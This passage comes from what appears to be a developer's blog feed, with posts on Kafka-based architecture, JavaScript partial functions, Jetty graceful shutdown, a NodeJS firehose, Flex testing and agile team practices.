                ('ob_type', ctypes.c_void_p)]
Next, let's look at the Python 3.6
PyDictObject definition, which boils down to this:
typedef struct {
    PyObject_HEAD
    Py_ssize_t ma_used;
    uint64_t ma_version_tag;
    PyDictKeysObject *ma_keys;
    PyObject **ma_values;
} PyDictObject;
We can mirror the structure behind the
dict this way, plus add some methods that will be useful later:
class DictStruct(PyObjectStruct):
    _fields_ = [("ma_used", py_ssize_t),
                ("ma_version_tag", ctypes.c_uint64),
                ("ma_keys", ctypes.c_void_p),
                ("ma_values", ctypes.c_void_p),
                ]

    def __repr__(self):
        return (f"DictStruct(size={self.ma_used}, "
                f"refcount={self.ob_refcnt}, "
                f"version={self.ma_version_tag})")

    @classmethod
    def wrap(cls, obj):
        assert isinstance(obj, dict)
        return cls.from_address(id(obj))
As a sanity check, let's make sure our structures match the size in memory of the types they are meant to wrap:
assert object.__basicsize__ == ctypes.sizeof(PyObjectStruct)
assert dict.__basicsize__ == ctypes.sizeof(DictStruct)
With this setup, we can now wrap any dict object to get a look at its internal properties. Here's what this gives for a simple dict:
D = dict(a=1, b=2, c=3)
DictStruct.wrap(D)
DictStruct(size=3, refcount=1, version=508220)
To convince ourselves further that we're properly wrapping the object, let's make two more explicit references to this dict, add a new key, and make sure the size and reference count reflect this:
D2 = D
D3 = D2
D3['d'] = 5
DictStruct.wrap(D)
DictStruct(size=4, refcount=3, version=515714)
It seems this is working correctly!
So what does the version number do? As Brandon explained in his talk, every dict in CPython 3.6 now has a version number that is updated each time the dict is modified. Every modification also increments a single interpreter-wide counter, whose new value becomes the modified dict's version.
This global value is stored in the
pydict_global_version variable in the CPython source.
So if we create a bunch of new dicts, we should expect each to have a higher version number than the last:
for i in range(10):
    dct = {}
    print(DictStruct.wrap(dct))
DictStruct(size=0, refcount=1, version=518136)
DictStruct(size=0, refcount=1, version=518152)
DictStruct(size=0, refcount=1, version=518157)
DictStruct(size=0, refcount=1, version=518162)
DictStruct(size=0, refcount=1, version=518167)
DictStruct(size=0, refcount=1, version=518172)
DictStruct(size=0, refcount=1, version=518177)
DictStruct(size=0, refcount=1, version=518182)
DictStruct(size=0, refcount=1, version=518187)
DictStruct(size=0, refcount=1, version=518192)
You might expect these versions to increment by one each time, but the version numbers are affected by the fact that Python uses many dictionaries in the background: among other things, local variables, global variables, and object attributes are all stored as dicts, and creating or modifying any of these results in the global version number being incremented.
Similarly, any time we modify our dict it gets a higher version number:
D = {}
Dwrap = DictStruct.wrap(D)
for i in range(10):
    D[i] = i
    print(Dwrap)
DictStruct(size=1, refcount=1, version=521221)
DictStruct(size=2, refcount=1, version=521254)
DictStruct(size=3, refcount=1, version=521270)
DictStruct(size=4, refcount=1, version=521274)
DictStruct(size=5, refcount=1, version=521278)
DictStruct(size=6, refcount=1, version=521288)
DictStruct(size=7, refcount=1, version=521329)
DictStruct(size=8, refcount=1, version=521403)
DictStruct(size=9, refcount=1, version=521487)
DictStruct(size=10, refcount=1, version=521531)
Wouldn't it be nice to read this version directly as a method on dicts themselves? Let's try monkey-patching one on:

dict.get_version = lambda obj: DictStruct.wrap(obj).ma_version_tag
---------------------------------------------------------------------------
TypeError                                 Traceback (most recent call last)
<ipython-input-8-99d51a65c779> in <module>()
----> 1 dict.get_version = lambda obj: DictStruct.wrap(obj).ma_version_tag

TypeError: can't set attributes of built-in/extension type 'dict'
We get an error, because Python protects the attributes of built-in types from this kind of mucking.
But never fear! We can get around this with (you guessed it)
ctypes!
The attributes and methods of any Python object are stored in its
__dict__ attribute, which in Python 3.6 is not a dictionary but a
mappingproxy object, which you can think of as a read-only wrapper of the underlying dictionary:
class Foo:
    bar = 4

Foo.__dict__
mappingproxy({'__dict__': <attribute '__dict__' of 'Foo' objects>, '__doc__': None, '__module__': '__main__', '__weakref__': <attribute '__weakref__' of 'Foo' objects>, 'bar': 4})
In fact, looking at the Python 3.6
mappingproxyobject implementation, we see that it's simply an object with a pointer to an underlying dict.
typedef struct {
    PyObject_HEAD
    PyObject *mapping;
} mappingproxyobject;
Let's write a
ctypes structure that exposes this:
import types

class MappingProxyStruct(PyObjectStruct):
    _fields_ = [("mapping", ctypes.POINTER(DictStruct))]

    @classmethod
    def wrap(cls, D):
        assert isinstance(D, types.MappingProxyType)
        return cls.from_address(id(D))

# Sanity check
assert types.MappingProxyType.__basicsize__ == ctypes.sizeof(MappingProxyStruct)
Now we can use this to get a C-level handle for the underlying dict of any mapping proxy:
proxy = MappingProxyStruct.wrap(dict.__dict__)
proxy.mapping
<__main__.LP_DictStruct at 0x10667dc80>
And we can pass this handle to functions in the C API in order to modify the dictionary wrapped by a read-only mapping proxy:
def mappingproxy_setitem(obj, key, val):
    """Set an item in a read-only mapping proxy"""
    proxy = MappingProxyStruct.wrap(obj)
    ctypes.pythonapi.PyDict_SetItem(proxy.mapping,
                                    ctypes.py_object(key),
                                    ctypes.py_object(val))
mappingproxy_setitem(dict.__dict__, 'get_version', lambda self: DictStruct.wrap(self).ma_version_tag)
Once this is executed, we can call
get_version() as a method on any Python dictionary to get the version number:
{}.get_version()
544453
This kind of monkey patching could be used for any built-in type; for example, we could add a
scramble method to strings that randomly chooses upper or lower case for its contents:
import random

mappingproxy_setitem(str.__dict__, 'scramble',
                     lambda self: ''.join(random.choice([c.lower(), c.upper()])
                                          for c in self))
'hello world'.scramble()
'hellO WORLd'
The possibilities are endless, but be warned that any time you muck around with the CPython internals at runtime, there are likely to be strange side-effects. This is definitely not code you should use for any purpose beyond simply having fun exploring the language.
If you're curious about other ways you can modify the CPython runtime, you might be interested in my post from two years ago, Why Python is Slow: Looking Under the Hood.
Now that we have easy access to the dict version number, you might wonder what we can do with it.
The answer is, currently, not so much. In the CPython source, the only time the version tag is referenced aside from its definition is in a unit test. Various Python optimization projects will in the future be able to use this feature to better optimize Python code, but to my knowledge none do yet (for example, here's a relevant Numba issue and FATpython discussion).
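To make the intended use concrete, here is a pure-Python sketch of the kind of guard an optimizer could build on top of a version tag. It simulates the counter by hand rather than reading the real ma_version_tag:

```python
class VersionedDict(dict):
    """A dict that tracks its own version, mimicking CPython 3.6's ma_version_tag."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.version = 0

    def __setitem__(self, key, value):
        super().__setitem__(key, value)
        self.version += 1  # real CPython bumps a global counter instead

def cached_lookup(d, key, cache={}):
    """Re-read d[key] only when d has changed since the last call."""
    entry = cache.get(id(d))
    if entry is not None and entry[0] == d.version:
        return entry[1]          # guard passed: reuse the cached value
    value = d[key]               # guard failed: redo the (expensive) lookup
    cache[id(d)] = (d.version, value)
    return value

d = VersionedDict(a=1)
assert cached_lookup(d, 'a') == 1   # first call populates the cache
d['a'] = 2                          # bumps d.version
assert cached_lookup(d, 'a') == 2   # stale guard forces a re-read
```

The mutable default `cache` is a deliberate shortcut for the sketch; a real optimizer would hold its guards elsewhere.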
So for the time being, access to the dictionary version number is, as they say, purely academic. But I hope that some time in the near future, a web search will land someone on this page who will find this code useful in more than a purely academic sense.
Happy hacking! | http://nbviewer.jupyter.org/url/jakevdp.github.io/downloads/notebooks/DictVersion.ipynb | CC-MAIN-2018-30 | en | refinedweb |
2017-01-13 07:41 AM
Hello All
I know that snapmirrors are different in CDOT, and since our NetApp expert who usually did these has moved on to a different company, I now have to do them myself. So here is my issue.
SVM-QA-02 has two different volumes on different aggregates, HMG_DB and HMG_DG.
I need to snapmirror from DB to DG. Both volumes are online and running, but the Oracle DBA will stop the listeners for the data guard side to allow me to snapmirror to that DG side. I think this is what I do based on my knowledge of 7-mode
1. unmount DG volume from server
2. unmount from namespace
3. put DG volume in restricted mode
4. run on cluster snapmirror create -source-path svm-qa-02:hmg_db -destination-path svm-qa-02:hmg_dg -schedule 15_minute
5. run on cluster snapmirror initialize svm-qa-02:hmg_dg
6. mount in namespace
7. let snapmirror run every hour at :15 until DBA is ready for final sync/break
8. final sync/break and then mount on server again
Is that correct? Can it be done via the webui?
thanks
ed
2017-01-18 07:58 AM
Hi
What's the purpose of the SnapMirror?
If it's to migrate the data from one aggregate to another - you would be glad to hear that there is a vol move command that does that for you - non-disruptively.
Was that your goal?
Gidi | https://community.netapp.com/t5/Data-ONTAP-Discussions/Snapmirror-in-CDOT/td-p/126978 | CC-MAIN-2018-30 | en | refinedweb |
Encrypting an Amazon S3 Bucket Object on the Server Using AWS KMS
The following example uses the
PutObject
method to add the object
myItem to the bucket
myBucket with server-side encryption set to AWS KMS.
Note that this differs from Setting Default Server-Side Encryption for an Amazon S3 Bucket; in that case, the objects are encrypted without you having to explicitly perform the operation on each object.
Choose
Copy to save the code locally.
Create the file encrypt_object_on_server.go.
Add the required packages.
import (
    "github.com/aws/aws-sdk-go/aws"
    "github.com/aws/aws-sdk-go/aws/session"
    "github.com/aws/aws-sdk-go/service/s3"

    "fmt"
    "os"
    "strings"
)
Get the KMS key from the command line,
where
key is a KMS key ID as created in the Creating a CMK in AWS Key Management Service example,
and set the bucket and object names.
if len(os.Args) != 2 {
    fmt.Println("You must supply a key")
    os.Exit(1)
}
key := os.Args[1]

bucket := "myBucket"
object := "myItem"
Create a session and Amazon S3 client.
sess := session.Must(session.NewSessionWithOptions(session.Options{
    SharedConfigState: session.SharedConfigEnable,
}))

svc := s3.New(sess)
Create the input for and call
PutObject.
Notice that the
ServerSideEncryption
field is set to
aws:kms,
indicating that Amazon S3 encrypts the object using AWS KMS.
Finally, display a success message to the user.

input := &s3.PutObjectInput{
    Body:                 strings.NewReader(object),
    Bucket:               aws.String(bucket),
    Key:                  aws.String(object),
    ServerSideEncryption: aws.String("aws:kms"),
    SSEKMSKeyId:          aws.String(key),
}

_, err := svc.PutObject(input)
if err != nil {
    fmt.Println("Got an error adding object to bucket:", err)
    os.Exit(1)
}

fmt.Println("Added object " + object + " to bucket " + bucket + " with AWS KMS encryption")
See the complete example on GitHub. | https://docs.aws.amazon.com/sdk-for-go/v1/developer-guide/s3-example-server-side-encryption-with-kms.html | CC-MAIN-2018-30 | en | refinedweb |
This page shows how to migrate data stored in a ThirdPartyResource (TPR) to a CustomResourceDefinition (CRD).
Kubernetes does not automatically migrate existing TPRs. This is due to API changes introduced as part of graduating to beta under a new name and API group. Instead, both TPR and CRD are available and operate independently in Kubernetes 1.7. Users must migrate each TPR one by one to preserve their data before upgrading to Kubernetes 1.8.
The simplest way to migrate is to stop all clients that use a given TPR, then delete the TPR and start from scratch with a CRD. This page describes an optional process that eases the transition by migrating existing TPR data for you on a best-effort basis.
Rewrite the TPR definition
Clients that access the REST API for your custom resource should not need any changes. However, you will need to rewrite your TPR definition as a CRD.
Make sure you specify values for the CRD fields that match what the server used to fill in for you with TPR.
For example, if your ThirdPartyResource looks like this:
```yaml
apiVersion: extensions/v1beta1
kind: ThirdPartyResource
metadata:
  name: cron-tab.stable.example.com
description: "A specification of a Pod to run on a cron style schedule"
versions:
- name: v1
```
A matching CustomResourceDefinition could look like this:
```yaml
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: crontabs.stable.example.com
spec:
  scope: Namespaced
  group: stable.example.com
  versions:
  - name: v1
    served: true
    storage: true
  names:
    kind: CronTab
    plural: crontabs
    singular: crontab
```
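The mapping between the old and new names follows a mechanical pattern, which a rough Python helper can make explicit. This is only a sketch: its pluralization just appends "s", which happens to work for crontab but not for every resource name:

```python
def tpr_to_crd_names(tpr_name):
    """Derive CRD naming fields from a TPR name like 'cron-tab.stable.example.com'.

    TPR kind names are dashed; the CRD kind is CamelCase, and the CRD
    metadata name is '<plural>.<group>'. Pluralization here is naive.
    """
    kind_part, group = tpr_name.split(".", 1)
    words = kind_part.split("-")
    kind = "".join(w.capitalize() for w in words)   # cron-tab -> CronTab
    singular = "".join(words)                        # crontab
    plural = singular + "s"                          # crontabs
    return {"metadata_name": plural + "." + group,
            "group": group, "kind": kind,
            "plural": plural, "singular": singular}

print(tpr_to_crd_names("cron-tab.stable.example.com"))
```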
Install the CustomResourceDefinition
While the source TPR is still active, install the matching CRD with
kubectl create.
Existing TPR data remains accessible because TPRs take precedence over CRDs when both try
to serve the same resource.
After you create the CRD, make sure the Established condition goes to True. You can check it with a command like this:
kubectl get crd -o 'custom-columns=NAME:{.metadata.name},ESTABLISHED:{.status.conditions[?(@.type=="Established")].status}'
The output should look like this:
NAME ESTABLISHED crontabs.stable.example.com True
Stop all clients that use the TPR
The API server attempts to prevent TPR data for the resource from changing while it copies objects to the CRD, but it can’t guarantee consistency in all cases, such as with multiple masters. Stopping clients, such as TPR-based custom controllers, helps to avoid inconsistencies in the copied data.
In addition, clients that watch TPR data do not receive any more events once the migration begins. You must restart them after the migration completes so they start watching CRD data instead.
Back up TPR data
In case the data migration fails, save a copy of existing data for the resource:
kubectl get crontabs --all-namespaces -o yaml > crontabs.yaml
You should also save a copy of the TPR definition if you don’t have one already:
kubectl get thirdpartyresource cron-tab.stable.example.com -o yaml --export > tpr.yaml
Delete the TPR definition
Normally, when you delete a TPR definition, the API server tries to clean up any objects stored in that resource. Because a matching CRD exists, the server copies objects to the CRD instead of deleting them.
kubectl delete thirdpartyresource cron-tab.stable.example.com
Verify the new CRD data
It can take up to 10 seconds for the TPR controller to notice when you delete the TPR definition and to initiate the migration. The TPR data remains accessible during this time.
Once the migration completes, the resource begins serving through the CRD. Check that all your objects were correctly copied:
kubectl get crontabs --all-namespaces -o yaml
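A quick way to sanity-check the copy against the backup you saved earlier is to compare object counts. The sketch below counts "kind:" lines rather than parsing YAML, so treat it as a smoke test only; in practice you would read the pre-migration crontabs.yaml backup and a fresh dump of the CRD data, then compare the two counts:

```python
def count_objects(manifest_text, kind="CronTab"):
    """Rough object count: tally 'kind: <Kind>' lines in a dumped manifest."""
    return sum(1 for line in manifest_text.splitlines()
               if line.strip() == "kind: " + kind)

sample = """\
apiVersion: stable.example.com/v1
kind: CronTab
metadata:
  name: my-cron
---
apiVersion: stable.example.com/v1
kind: CronTab
metadata:
  name: other-cron
"""
print(count_objects(sample))  # 2
```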
If the copy failed, you can quickly revert to the set of objects that existed just before the migration by recreating the TPR definition:
kubectl create -f tpr.yaml
Restart clients
After verifying the CRD data, restart any clients you stopped before the migration, such as custom controllers and other watchers. These clients now access CRD data when they make requests on the same API endpoints that the TPR previously served. | https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/migrate-third-party-resource/ | CC-MAIN-2018-30 | en | refinedweb |
If/Else
Part of TutorialFundamentals
Description
Simple (yet effective) flow control.
Example
import std.stdio;

void main() {
    int anInteger;

    if (anInteger == 0)
        writef("It's zero!");
    else
        writef("It's not zero!");
}
Output
It's zero!
More Information
In D, all variable declarations that do not have a specific initializer get initialized with the value of their type's .init property. In this case, anInteger is of type int, and is assigned the value of int.init, which is zero.
To find out the initializer for other types, you may use the writeln function like so:
import std.stdio;

void main() {
    writeln(int.init);
    writeln(float.init);
}
Output
0
nan
For more information about .init and other properties, refer to the Properties documentation. | http://dsource.org/projects/tutorials/wiki/IfElseExample/D2 | CC-MAIN-2018-30 | en | refinedweb |
Copy pixel data from one buffer to another
#include <screen/screen.h>
int screen_blit(screen_context_t ctx, screen_buffer_t dst, screen_buffer_t src, const int *attribs)
Function Type: Delayed Execution
This function requests pixels from one buffer be copied to another. The operation isn't executed until an API function that flushes blits is called, or your application posts changes to one of the context's windows (screen_post_window()).
0 if successful, or -1 if an error occurred (errno is set; refer to errno.h for more details). | http://www.qnx.com/developers/docs/7.0.0/com.qnx.doc.screen/topic/screen_blit.html | CC-MAIN-2018-51 | en | refinedweb |
def distance_from_zero (num): return distance_from_zero if type(num) == int or type(num) == float: return abs(num) elif type (num): return abs(num) else: return 'nope'
Oops, try again. Your function seems to fail on input -10 when it returned '' instead of '10'
I have coded everything correctly but it is coming up with an error message. I have looked at all the forums and I can't find anything.
Please help me!!!!
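For comparison, here is a version that behaves the way the checker expects. Note that the stray "return distance_from_zero" on the first line of the posted code returns the function object itself before any of the type checks can run, which is why the checker never sees '10':

```python
def distance_from_zero(num):
    # Do the type check first; there must be no return before it.
    if type(num) == int or type(num) == float:
        return abs(num)
    else:
        return 'nope'  # same fallback string as in the posted code

print(distance_from_zero(-10))   # prints 10
print(distance_from_zero(True))  # prints nope (type(True) is bool, not int)
```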
I do like the way I can treat lists in Python. It does any recursion solution to look easy and clean. For instance the typical problem of getting all the permutations of elements in a list, in Python looks like:
def permutation_recursion(numbers, sol):
    if not numbers:
        print "this is a permutation", sol
    for i in range(len(numbers)):
        permutation_recursion(numbers[:i] + numbers[i+1:], sol + [numbers[i]])

def get_permutations(numbers):
    permutation_recursion(numbers, list())

if __name__ == "__main__":
    get_permutations([1,2,3])
I do like the way I can simple get new instances of modified lists by doing things like
numbers[:i] + numbers[i+1:] or
sol + [numbers[i]]
If I try to code exactly the same in Java, it looks like:
import java.util.ArrayList;
import java.util.Arrays;
class rec {
static void permutation_recursion(ArrayList<Integer> numbers, ArrayList<Integer> sol) {
if (numbers.size() == 0)
System.out.println("permutation="+Arrays.toString(sol.toArray()));
for(int i=0;i<numbers.size();i++) {
int n = numbers.get(i);
ArrayList<Integer> remaining = new ArrayList<Integer>(numbers);
remaining.remove(i);
ArrayList<Integer> sol_rec = new ArrayList<Integer>(sol);
sol_rec.add(n);
permutation_recursion(remaining,sol_rec);
}
}
static void get_permutation(ArrayList<Integer> numbers) {
permutation_recursion(numbers,new ArrayList<Integer>());
}
public static void main(String args[]) {
Integer[] numbers = {1,2,3};
get_permutation(new ArrayList<Integer>(Arrays.asList(numbers)));
}
}
To create the same recursion I need to do :
ArrayList<Integer> remaining = new ArrayList<Integer>(numbers);
remaining.remove(i);
ArrayList<Integer> sol_rec = new ArrayList<Integer>(sol);
sol_rec.add(n);
Which is quite ugly, and it gets worse for more complex solutions, like in this example.
So my question is: are there any built-in operators or helper functions in the Java API that would make this solution more "Pythonic"?
No.
But this is why Martin Odersky created Scala. He's even said that one of his goals for Scala is that it be the Python of the Java world. Scala compiles to Java bytecode and easily interops with Java compiled classes.
If that's not an option, you could take a look at the Commons Collection Library.
You can use the
clone() function on Lists to get a shallow copy of them. That way you won’t have to instantiate a new Object yourself but can just use the copy.
ArrayList<Integer> remaining = (ArrayList<Integer>) numbers.clone(); remaining.remove(i);
Other than that, no, java does not have such operators for Lists.
Apache Commons solves a lot of these kinds of issues. Have a look at ArrayUtils to do slicing. Java doesn't have a lot of syntactic sugar like scripting languages do for various reasons.
Different languages require different styles. Trying to accomplish
mylist[:i] + mylist[i+1:] in java is like using a hammer with a screw. Yes, you can do it, but it's not very tidy. I believe the equivalent might be something like
ArrayList temp = new ArrayList(list); temp.remove(index);
I believe the following accomplishes the same task, but does so in a slightly different fashion, but doesn't suffer readability issues. Instead of creating a new list, it modifies the list, passes it on, and returns the list to its previous state when the recursive call returns.
import java.util.Arrays;
import java.util.List;
import java.util.ArrayList;

public class Permutation {
    public static void main(String[] args) {
        List<List<Integer>> result = permutations(Arrays.asList(new Integer[] {1, 2, 3}));
        for (List<Integer> permutation : result) {
            System.out.println(permutation);
        }
    }

    public static <T> List<List<T>> permutations(List<T> input) {
        List<List<T>> out = new ArrayList<List<T>>();
        permutationsSlave(input, new ArrayList<T>(), out);
        return out;
    }

    public static <T> void permutationsSlave(List<T> input, ArrayList<T> permutation, List<List<T>> result) {
        if (input.size() == permutation.size()) {
            result.add(new ArrayList<T>(permutation));
            return;
        }
        for (T obj : input) {
            if (!permutation.contains(obj)) {
                permutation.add(obj);
                permutationsSlave(input, permutation, result);
                permutation.remove(permutation.size() - 1);
            }
        }
    }
}
The python way may look easy and cleaner, but ability to look clean often hides the fact that the solution is quite inefficient (for each level of recursion it creates 5 new lists).
But then my own solution isn't terribly efficient either -- instead of creating multiple new objects it performs redundant comparisons (though some of this could be alleviated by use of accumulators).
Hi 1 you can use stack, which will be more handy.
2 the for loop can be written like this : for(Number n:numbers) | http://www.dlxedu.com/askdetail/3/b9854e1159808402be6910900f6effc9.html | CC-MAIN-2018-51 | en | refinedweb |
CURLOPT_NOSIGNAL explained
NAME
CURLOPT_NOSIGNAL - skip all signal handling
SYNOPSIS
#include <curl/curl.h>
CURLcode curl_easy_setopt(CURL *handle, CURLOPT_NOSIGNAL, long onoff);
DESCRIPTION
If onoff is 1, libcurl will not use any functions that install signal handlers or any functions that cause signals to be sent to the process. This option is here to allow multi-threaded unix applications to still set/use all timeout options etc, without risking getting signals. If this option is set and libcurl has been built with the standard name resolver, timeouts will not occur while the name resolve takes place. In addition, using CURLAUTH_NTLM_WB authentication could cause a SIGCHLD signal to be raised.
DEFAULT

0
AVAILABILITY

Added in 7.10
RETURN VALUE
Returns CURLE_OK if the option is supported, and CURLE_UNKNOWN_OPTION if not.
Is this an XML file?
I'm guessing that your text file contains XML markup tags. Maybe it's something else, though, like for mailing lists and form letters.
In Word online help I looked up "importing xml files" and got a bunch of hits. Here are instructions from one of them:
1. Place the insertion point where you want to insert the data.
2. On the Insert menu, click Field, and in the Field names box, click IncludeText.
3. In the Filename or URL box, type the name of the file, including its system path or URL.
4. Select the Namespace mappings check box, and type a namespace in the format xmlns:variable="namespace". For example, xmlns:a="resume-schema".
5. If you want to insert only a fragment of data rather than the whole file, select the XPath expression check box, and then type the XPath (XML Path Language (XPath): A language used to address parts of an XML document. XPath also provides basic facilities for manipulation of strings, numbers, and Booleans.) expression in the box provided. For example, a:Resume/a:Name specifies the Name element in the root element Resume.
6. If you want to use an Extensible Stylesheet Language Transformation (XSLT) (XSL Transformation (XSLT): A file that is used to transform XML documents into other types of documents, such as HTML or XML. It is designed for use as part of XSL.) to format the data, select the XSL Transformation check box, and type the name of the file, including its system path or URL.
7. Click OK.
Good luck.
using VB to generate word letters from txt files
import "github.com/syncthing/syncthing/lib/signature"
Package signature provides simple methods to create and verify signatures in PEM format.
GenerateKeys returns a new key pair, with the private and public key encoded in PEM format.
Sign computes the hash of data and signs it with the private key, returning a signature in PEM format.
Verify computes the hash of data and compares it to the signature using the given public key. Returns nil if the signature is correct.
Package signature imports 11 packages and is imported by 4 packages. Updated 2017-10-07.
Luca Grulla 2015-10-23T06:11:07+00:00 Luca Grulla Evolutionary Architecture and Microservices: a real world example 2015-07-01T00:00:00+00:00 <p><a href="">Microservices</a> have received a lot of attention over the last few years. As an architectural style it delivers a lof of benefits compared to a <a href="">Monolith application</a>, but there’s no doubt that it comes with the cost of a distributed system (such as discoverability, fault tolerance, data consistency just to name a few).</p> <p>I believe a Microservice architecture shouldn’t be your starting point. Instead, it should be the result of applying Evolutionary Architecture and <a href="">Domain Driven Design</a> principles to your system, balanced with a analysis of the maturity stage of your product (both from a business and technology perspectives).</p> <p>While building <a href="">uSwitch car insurance</a> we followed exactly these principles; since the beginning of the project until today we refined our architecture based on our increased understanding of the business needs, moving from a monolith by choice system to a well defined microservices architecture that keeps evolving and improving.</p> <p>If I look back at these 3 years I can identify five major stages:</p> <ol> <li><a href="#fast-development-cycle">Fast development cycle</a></li> <li><a href="#support-business-workflows">Support business workflows</a></li> <li><a href="#separation-of-concerns">Separation of concerns</a></li> <li><a href="#decouple-and-scalability">Decouple and scalability</a></li> <li><a href="#leverage-ecosystem">Leveraging uSwitch technology ecosystem</a></li> </ol> <h2><a name="fast-development-cycle"></a>Stage 1: Fast development cycle</h2> <p>We wanted to build a new product from scratch and we wanted to go live as soon as possible. 
Our first architecture was optimized to enable us to have a fast development cycle and the shortest path to production.</p> <p><img src="/assets/ArchitectureV1.1.png" style="border:0" alt="Architecture for fast development cycle"></p> <!-- <div class="mxgraph" style="position:relative;overflow:hidden;width:100%;"><div style="width:1px;height:1px;overflow:hidden;">3Vhdb+soEP01eWzl2IkTPzbddu9KW+lKlbbdR2KwjYpNhHE++us72ION4ySbarNN9+YhMgcY4JwZGBgF9/n2d0VW2ZOkTIx8j25HwW8j34+mE/g3wK4BQn/eAKnitIHGHfDM3xmCHqIVp6zsNdRSCs1XfTCWRcFi3cMSKXAINLYiqTXfAc8xEUP0hVOdNejcDzv8B+NpZocZh1FTU+qdtUFZQiqhb2oI6kx1TqwtnMjWs6tEAzsEwKYdq+j1eJcy7wGKlR1ZuF7eX39B1r0uS6koUz1I8OLNJTJ4AC2VlGDIfOXbeyaMnlaraRTPyTiaTWicRBM6v2nsPJ7bvF2dYgVO9t+aRI7XRFRIxwtbllyzgTRKVgVlxs54FCw2GbR5XpHY1G7AeQHLdC6wuuaXLOu+ppzLtVNSUhPtlHEOTGmGnn/OSjvKIXyYzJlWO+Md1r1QJAwdf4rlTeebfohY5vhlFDQYQWXT1nTHK3wgtWfSjDHg0AwkvIE7+QEq4DANtiBAobAoM7IyYCxkBaa/P+vTCG1Y1mezAetzhFzSQ+x2UdLHQ+duWcfxflHW7cqvwbrpe4z14pdi3VKKrAdTtPkVrM9p4ocw0XgSzMJoeWAfH1ANp5XhmXIFRz2X5oQsZWVm6vJaaiOWPcC/B9OB9ecTe7nd7i++le8zjSmZw/QfhWapIobTcuSHAkYHltfwmZpPCy0hAvoIjN1rtycYMGjwgTj3UkiTiBSyFjThQuxBRPDU6BsD4yZnWRg9OKRqd1iRc0rNMAejTELrRMgNIBm0Y9BhkUCY/sBZuB60YaWZo6n+C4qQiDUe0dRGdfn6/uPt5QJzTBzdSD3gPzbPu6j/4I7g+M+TLFI5UN/uhxToKbVUx9Q6Gbv/BZttqNl9L8JLicPmocTKYhdlE4d2TxQKtxIsSqUzmcqCiIcOBZezmaxxT4c/tuX61cC3Uyz9jY2AK7VzqkzR1DWsE6XvlKoDJhakLHls4UeIzZ4UZnafFAJWJytVS37Cn2C0lB2zU2+fQ0EVExCp6/6ELirP8IZ3AXnsdy1Op0cjzzh09YHqtv4nUxxWVN/hjOUzdYsrtW6vPZcS8cg17KSIzSF4DRVtwH9Kxh5v30zTa8pYXwWvouKBO89XqujN+ipO/sciNun1V6gIb4AxPIoFY+JNwniK7ztu+vD69OcZqaObhRmSP5UlCrJkYkHit7R2AZttwo0uqX+tGviQiON0L2X/lIEc9tWjKciNdzsLPTz7z+Yczf2UHMbtmsgkKUHofVHaUQ/pBMXuna9p3j3gBg8f</div></div> --> <p>Even if at the beginning of our journey we identified two separate concerns:</p> <ul> <li>serving the actual <a href="">website</a></li> <li>integration with multiple insurance APIs for real-time brokerage</li> </ul> <p>Although our experience was already suggesting that Microservices could be an excellent 
solution for the problems we were going to solve, we wanted a fast development cycle, minimum friction between changes and access to production; we also didn’t want to get distracted building solutions that wouldn’t add much value for our Release 1. We explicitly chose to build a monolithic <a href="">Ruby on Rails</a> application, with a well-defined internal boundary between the web code and the integration layer.</p> <h2><a name="support-business-workflows"></a>Stage 2: Support business workflows</h2> <p>Once the new product went live, sales reports from our partners started to flow in (mostly as CSV files over FTP). With sales data we started to identify KPIs and draw correlations between the web traffic, partner offers and the different conversion rates. We knew that the data aggregation and analysis could be done manually for a short period of time, but we had to automate the workflow before the volume grew. We therefore introduced a new system responsible for sales data ingestion and for producing an analytical dashboard.</p> <p><img src="/assets/ArchitectureV2.1.png" style="border:0" alt="Architecture for good support of the business flow"></p> <p>In order to report reliable visits-to-sales conversion rates, the newly built dashboard had to have access to some web-centric data (such as the number of unique visitors, the number of completed journeys and so on). We introduced a simple REST API on the web layer and used cron jobs to do scheduled data transfer from one system to another.
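<p>One of those scheduled jobs boils down to very little code; here is a sketch (endpoint and field names are hypothetical, not our actual API), with the HTTP client and the store injected:</p>

```javascript
// Hypothetical sketch of one scheduled transfer job: a cron-triggered
// worker pulls daily web metrics from the website's REST API and hands
// a derived record to the sales-analytics store. Field names are
// illustrative, not the real ones.
function aggregateDailyMetrics(fetchMetrics, store) {
  // fetchMetrics: () -> {date, uniqueVisitors, completedJourneys}
  // store: (record) -> void, e.g. an INSERT into the analytics database
  var metrics = fetchMetrics();
  store({
    date: metrics.date,
    uniqueVisitors: metrics.uniqueVisitors,
    completedJourneys: metrics.completedJourneys,
    conversionRate: metrics.completedJourneys / metrics.uniqueVisitors
  });
}
```

<p>A cron entry then runs the worker once a day; because both dependencies are injected, the worker can be exercised without a web server or a database.</p>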
This solution allowed us to move forward, and because it was flawed by choice (data duplication, poor resiliency) it forced us to think over time about what we really needed in that space.</p> <h2><a name="separation-of-concerns"></a>Stage 3: Separation of concerns</h2> <p>It was time to move our architecture towards <a href="">SOA</a> to benefit from more clearly defined <a href="">bounded contexts</a>.</p> <p><img src="/assets/ArchitectureV3.1.png" style="border:0" alt="Architecture for separation of concerns"></p> <p>We knew from the very beginning that the integration layer and the websites were two different contexts; while one is responsible for collecting and presenting information, the other is responsible for communicating with the external partners and transforming data between multiple representations. The integration layer had been encapsulated at the boundary of the web system so far, but it was now time to pull it out into its own service, written in <a href="">Clojure</a>. The integration between the website and the new aggregation service was an HTTP POST with JSON as the data type. We also started understanding more of our analytics needs: a <a href="">Postgres</a> instance logically close to the integration layer became our analytics data source.</p> <h2><a name="decouple-and-scalability"></a>Stage 4: Decoupling and scalability</h2> <p>At this stage we had enough traffic and sales to really benefit from a more mature data pipeline and analytics platform. REST-style integrations brilliantly supported us until this point, but we were at a stage where we wanted to increase system resiliency.
